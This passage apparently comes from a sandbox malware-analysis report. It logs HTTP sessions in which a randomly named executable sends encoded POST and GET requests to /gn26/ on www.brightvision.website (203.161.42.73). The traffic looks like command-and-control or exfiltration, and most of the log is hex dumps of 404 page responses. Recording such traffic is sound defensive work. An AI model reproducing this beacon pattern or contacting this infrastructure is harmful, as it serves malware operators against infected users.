                                                                              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                              Jan 11, 2025 09:29:58.153789043 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                              Jan 11, 2025 09:29:58.153800964 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                              Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                              Jan 11, 2025 09:29:58.153825998 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                              Jan 11, 2025 09:29:58.153837919 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                              Jan 11, 2025 09:29:58.153850079 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                              Jan 11, 2025 09:29:58.153861046 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                              Jan 11, 2025 09:29:58.153872013 CET224INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                                              Jan 11, 2025 09:29:58.158688068 CET1236INData Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.850012203.161.42.73803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:00.136533976 CET1692OUTPOST /gn26/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.brightvision.website
                                                                              Origin: http://www.brightvision.website
                                                                              Referer: http://www.brightvision.website/gn26/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 50 6d 51 41 34 79 47 75 67 6f 70 32 35 48 79 57 72 6c 4e 6e 72 73 51 34 4c 6e 56 4b 47 2b 36 4e 34 54 34 72 43 35 34 42 37 77 35 63 55 77 4a 56 46 50 42 61 31 36 61 4c 50 62 4c 35 4b 7a 30 6e 6f 55 75 54 36 4b 38 32 4f 4a 55 47 34 4a 2f 45 71 30 50 44 4f 52 51 6f 63 7a 77 49 53 6c 51 6e 4b 41 4e 5a 6f 4a 38 78 49 36 73 71 4f 53 57 59 6f 41 4c 41 63 50 6b 4e 30 49 57 4f 50 49 45 6e 31 48 41 47 48 48 55 6c 6b 6b 54 4f 56 6d 39 79 45 52 61 67 36 38 6b 54 55 35 31 76 7a 65 74 46 50 71 77 7a 36 69 61 6f 41 71 33 51 57 57 31 37 44 66 37 65 52 30 36 56 6a 31 77 35 4f 58 38 4b 63 49 6b 62 64 49 69 39 2b 48 4d 6c 69 62 4f 44 46 54 2f 53 69 49 71 36 61 71 4d 55 51 42 68 79 42 35 6f 4a 4a 61 54 61 5a 61 66 4e 63 59 68 75 33 44 54 62 39 78 38 66 32 6a 79 49 61 2f 69 78 46 31 4c 4b 54 51 63 35 4c 36 6e 70 32 65 64 57 55 35 66 30 46 43 2b 44 76 58 69 68 77 43 6d 48 4c 4d [TRUNCATED]
                                                                              Data Ascii: DzLTc=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdqPmQA4yGugop25HyWrlNnrsQ4LnVKG+6N4T4rC54B7w5cUwJVFPBa16aLPbL5Kz0noUuT6K82OJUG4J/Eq0PDORQoczwISlQnKANZoJ8xI6sqOSWYoALAcPkN0IWOPIEn1HAGHHUlkkTOVm9yERag68kTU51vzetFPqwz6iaoAq3QWW17Df7eR06Vj1w5OX8KcIkbdIi9+HMlibODFT/SiIq6aqMUQBhyB5oJJaTaZafNcYhu3DTb9x8f2jyIa/ixF1LKTQc5L6np2edWU5f0FC+DvXihwCmHLMNr4qbTChKO6M+tE+Ag8Jk0L1aGaIMjFUPIkBek5cQKe0ebqrf31LY7lb0pnOyx/c489O8f9dWWcxlBWcvPdyCQrx/WLQIYGZBBOVHcbEW0ixIwCP4vtXowwWqXypxTW3SCFb4QLKug1cc1iKBi/TrXd8GdvnL3bmjzwYrymSy3vAISOf9bHX6PqzXCVTyJg4gT+kfYmajMthM2e0UXn570XGWe/hJNVvwmiVrnsgvqeztJ+6znoiNZ1oVAwjoCwcQJjHzK+hUsuLWOKOINiOS7GFHyiM2MKBiwNZRZXO7hNvLzqGjTyE9P80e6fR0yKIgTVe3BltC2QDJFfK/ARTnMRu0SH/LPT8jA08XAf6+JMgIzR1xBJpRwvgXqh5+ZLbdlDbYzuhk6TYF7OkP0hxBogt+mWNYeqn04FEcSKKtBW7Ev9RzAmWJ/UVfZtCWNWCvNP2ymoqzbS/Avzhwg5DRnHJEJbWG/O7eRHy4LaluJfG5VVlWvL6eKFwuioD2VlM9NWAJVc+roFnYtCztS3d+zg+p2Sxqns5Q9A58PyGx8g9oWsBo6vjw8F9g/elP4i5iY429ia/wZ9epDq+5JQzszQGIpFrOVzQ+tbx7VWDNbOT0KJMVYKqTDvQmO8aHfnC10VgTjSZnGW4tusjTFqVZcEFQrj4RplxUp [TRUNCATED]
                                                                              Jan 11, 2025 09:30:00.703860998 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:30:00 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:30:00.703902006 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                              Jan 11, 2025 09:30:00.703908920 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                              Jan 11, 2025 09:30:00.703918934 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                              Jan 11, 2025 09:30:00.703939915 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                              Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                              Jan 11, 2025 09:30:00.703946114 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                              Jan 11, 2025 09:30:00.703958035 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                              Jan 11, 2025 09:30:00.703983068 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                              Jan 11, 2025 09:30:00.704091072 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                              Jan 11, 2025 09:30:00.704097986 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                              Jan 11, 2025 09:30:00.708813906 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                              Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.850013203.161.42.73803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:02.682724953 CET384OUTGET /gn26/?DzLTc=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9MI5QldmEc54Vqz3e9231X82gi2igW+4eDd38X27Ejj4Gw==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.brightvision.website
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:30:03.301008940 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:30:03 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:30:03.301019907 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                              Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                              Jan 11, 2025 09:30:03.301026106 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                              Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                              Jan 11, 2025 09:30:03.301095009 CET1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                              Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                                              Jan 11, 2025 09:30:03.301103115 CET896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                                              Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                                              Jan 11, 2025 09:30:03.301131010 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                                              Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                                              Jan 11, 2025 09:30:03.301213026 CET224INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                                              Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.9428
                                                                              Jan 11, 2025 09:30:03.301218033 CET1236INData Raw: 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                                              Data Ascii: 2,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541"
                                                                              Jan 11, 2025 09:30:03.301232100 CET224INData Raw: 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38
                                                                              Data Ascii: "m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
                                                                              Jan 11, 2025 09:30:03.301609993 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                              Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
